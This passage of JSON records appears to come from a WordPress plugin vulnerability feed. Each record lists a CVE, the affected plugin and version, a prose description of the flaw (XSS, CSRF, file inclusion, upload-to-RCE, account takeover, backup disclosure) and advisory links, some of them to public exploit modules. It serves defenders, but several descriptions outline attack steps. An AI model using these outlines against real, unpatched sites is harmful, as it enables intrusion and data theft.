replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-plugin-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-plugin-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8513","slug":"qa-heatmap-analytics","versionImpact":"4.1.0.0","description":"The QA Analytics \u2013 Web Analytics Tool with Heatmaps & Session Replay Across All Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_save_plugin_config() function in all versions up to, and including, 4.1.0.0. This makes it possible for unauthenticated attackers to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15d29d58-9e28-4e18-aeb9-9c63cb308673?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15d29d58-9e28-4e18-aeb9-9c63cb308673?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qa-heatmap-analytics\\\/trunk\\\/class-qahm-admin-page-config.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qa-heatmap-analytics\\\/trunk\\\/class-qahm-admin-page-config.php#L801\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8392","slug":"sogrid","versionImpact":"1.5.2","description":"The WordPress Post Grid Layouts with Pagination \u2013 Sogrid plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2 via the 'tab' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This can also be exploited via CSRF techniques.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d81e01-9b6e-48e9-b9da-85444a3694e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d81e01-9b6e-48e9-b9da-85444a3694e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sogrid\\\/trunk\\\/src\\\/admin-panel\\\/views\\\/panel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sogrid\\\/trunk\\\/src\\\/admin-panel\\\/views\\\/panel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10260","slug":"tripetto","versionImpact":"8.0.6","description":"The Tripetto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via File uploads in all versions up to, and including, 8.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12402","slug":"tc-ecommerce","versionImpact":"1.3.4","description":"The Themes Coder \u2013 Create Android & iOS Apps For Your Woocommerce Site plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.4. This is due to the plugin not properly validating a user's identity prior to updating their password through the update_user_profile() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tc-ecommerce\\\/trunk\\\/controller\\\/app_user.php#L338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tc-ecommerce\\\/trunk\\\/controller\\\/app_user.php#L338\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec14b1e-6d1a-4451-9fce-ac064623d92f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec14b1e-6d1a-4451-9fce-ac064623d92f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49300","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows Reflected XSS. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12036","slug":"cs-framework","versionImpact":"7.1","description":"The CS Framework plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.9 via the get_widget_settings_json() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ed1978e-1dd7-45d3-829a-1a75c1789827?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ed1978e-1dd7-45d3-829a-1a75c1789827?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-34085","slug":"simple-file-list","description":"An unrestricted file upload vulnerability in the WordPress Simple File List plugin prior to version 4.2.3 allows unauthenticated remote attackers to achieve remote code execution. The plugin's upload endpoint (ee-upload-engine.php) restricts file uploads based on extension, but lacks proper validation after file renaming. An attacker can first upload a PHP payload disguised as a .png file, then use the plugin\u2019s ee-file-engine.php rename functionality to change the extension to .php. This bypasses upload restrictions and results in the uploaded payload being executable on the server.","refs":"[{\"url\":\"https:\\\/\\\/packetstorm.news\\\/files\\\/id\\\/160221\",\"name\":\"https:\\\/\\\/packetstorm.news\\\/files\\\/id\\\/160221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_simple_file_list_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_simple_file_list_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/simplefilelist.com\\\/\",\"name\":\"https:\\\/\\\/simplefilelist.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-simple-file-list-plugin-rce\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-simple-file-list-plugin-rce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20220426044003\\\/https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10192\\\/\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20220426044003\\\/https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10192\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-file-list\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-file-list\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/simple-file-list\\\/simple-file-list-423-remote-code-execution\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/simple-file-list\\\/simple-file-list-423-remote-code-execution\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28789","slug":"contact-forms","versionImpact":"1.5.4","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.5.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1977","slug":"restaurant-solutions-checklist","description":"The Restaurant Solutions \u2013 Checklist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Checklist points in version 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dca7f2e-f572-468a-8342-a6e096441561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dca7f2e-f572-468a-8342-a6e096441561?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wizlynxgroup.com\\\/security-research-advisories\\\/vuln\\\/WLX-2022-004\",\"name\":\"https:\\\/\\\/www.wizlynxgroup.com\\\/security-research-advisories\\\/vuln\\\/WLX-2022-004\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37959","slug":"embed-power-bi","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Atlas Public Policy Power BI Embedded for WordPress allows Stored XSS.This issue affects Power BI Embedded for WordPress: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/embed-power-bi\\\/wordpress-power-bi-embedded-for-wordpress-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/embed-power-bi\\\/wordpress-power-bi-embedded-for-wordpress-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10113","slug":"wpadcenter","versionImpact":"2.5.7","description":"The WP AdCenter \u2013 Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpadcenter_ad shortcode in all versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12098","slug":"ars-affiliate-page","versionImpact":"2.0.2","description":"The ARS Affiliate Page Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'utm_keyword' parameter in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ars-affiliate-page\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ars-affiliate-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25b2187-2ba8-4332-9f96-a003edd97ff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25b2187-2ba8-4332-9f96-a003edd97ff6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13403","slug":"wpforms-lite","versionImpact":"1.9.3.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018fieldHTML\u2019 parameter in all versions up to, and including, 1.9.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230497\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js?old=3223577&old_path=wpforms-lite%2Ftrunk%2Fassets%2Fjs%2Ffrontend%2Fwpforms.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230497\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js?old=3223577&old_path=wpforms-lite%2Ftrunk%2Fassets%2Fjs%2Ffrontend%2Fwpforms.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpforms-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpforms-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92ea6a89-b14f-4252-b886-e219c1bb658d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92ea6a89-b14f-4252-b886-e219c1bb658d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4580","slug":"file-provider","versionImpact":"1.2.3","description":"The File Provider WordPress plugin through 1.2.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8741353a-2a7f-4dee-b62d-7f5fe435f1a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8741353a-2a7f-4dee-b62d-7f5fe435f1a1\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-34084","slug":"boldgrid-backup","description":"An unauthenticated information disclosure vulnerability exists in the WordPress Total Upkeep plugin (also known as BoldGrid Backup) prior to version 1.14.10. The plugin exposes multiple endpoints that allow unauthenticated users to retrieve detailed server configuration (env-info.php) and discover backup metadata (restore-info.json). These backups, which may include full SQL database dumps, are accessible without authentication if their paths are known or guessed. The restore-info.json endpoint discloses the absolute filesystem path of the latest backup, which attackers can convert into a web-accessible URL under wp-content\/uploads\/ and download. Extracting the database archive may yield credential hashes from the wp_users table, facilitating offline password cracking or credential stuffing attacks.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-total-upkeep-boldgrid-backup-plugin-info-disclosure\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-total-upkeep-boldgrid-backup-plugin-info-disclosure\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boldgrid-backup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boldgrid-backup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.boldgrid.com\\\/wordpress-backup-plugin\\\/\",\"name\":\"https:\\\/\\\/www.boldgrid.com\\\/wordpress-backup-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/49252\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/49252\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28781","slug":"contact-forms","versionImpact":"1.5.4","description":"Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.5.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-unauth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-unauth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0900","slug":"ap-pricing-tables-lite","versionImpact":"1.1.6","description":"The Pricing Table Builder WordPress plugin through 1.1.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f601e637-a486-4f3a-9077-4f294ace7ea1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f601e637-a486-4f3a-9077-4f294ace7ea1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4374","slug":"wp-remote-users-sync","versionImpact":"1.2.11","description":"The WP Remote Users Sync plugin for WordPress is vulnerable to unauthorized access of data and addition of data due to a missing capability check on the 'refresh_logs_async' functions in versions up to, and including, 1.2.11. This makes it possible for authenticated attackers with subscriber privileges or above, to view logs.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e87cfc4-8e7c-47d6-80fc-9c293cdd8acb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e87cfc4-8e7c-47d6-80fc-9c293cdd8acb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file130\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/class-wprus-logger.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/class-wprus-logger.php#L117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1976","slug":"marketing-optimizer","versionImpact":"20200925","description":"The Marketing Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20200925. This is due to missing or incorrect nonce validation via the admin\/main-settings-page.php file. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketing-optimizer\\\/trunk\\\/admin\\\/main-settings-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketing-optimizer\\\/trunk\\\/admin\\\/main-settings-page.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2474","slug":"standout-color-boxes-and-buttons","versionImpact":"0.7.0","description":"The Standout Color Boxes and Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'color-button' shortcode in all versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/standout-color-boxes-and-buttons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/standout-color-boxes-and-buttons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37946","slug":"wp-recaptcha-integration","versionImpact":"1.2.5","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in weDevs ReCaptcha Integration for WordPress allows Stored XSS.This issue affects ReCaptcha Integration for WordPress: from n\/a through 1.2.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-recaptcha-integration\\\/wordpress-recaptcha-integration-for-wordpress-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-recaptcha-integration\\\/wordpress-recaptcha-integration-for-wordpress-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9456","slug":"wp-awesome-login","versionImpact":"0.4.0","description":"The WP Awesome Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0841127c-fe81-47b1-964f-15e006f618af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0841127c-fe81-47b1-964f-15e006f618af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-login\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-login\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52408","slug":"push-notification-for-wp-by-pushassist","versionImpact":"3.0.8","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Team PushAssist Push Notifications for WordPress by PushAssist allows Upload a Web Shell to a Web Server.This issue affects Push Notifications for WordPress by PushAssist: from n\/a through 3.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/push-notification-for-wp-by-pushassist\\\/wordpress-push-notifications-for-wordpress-by-pushassist-plugin-3-0-8-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/push-notification-for-wp-by-pushassist\\\/wordpress-push-notifications-for-wordpress-by-pushassist-plugin-3-0-8-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13444","slug":"wp-greet","versionImpact":"6.2","description":"The wp-greet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a 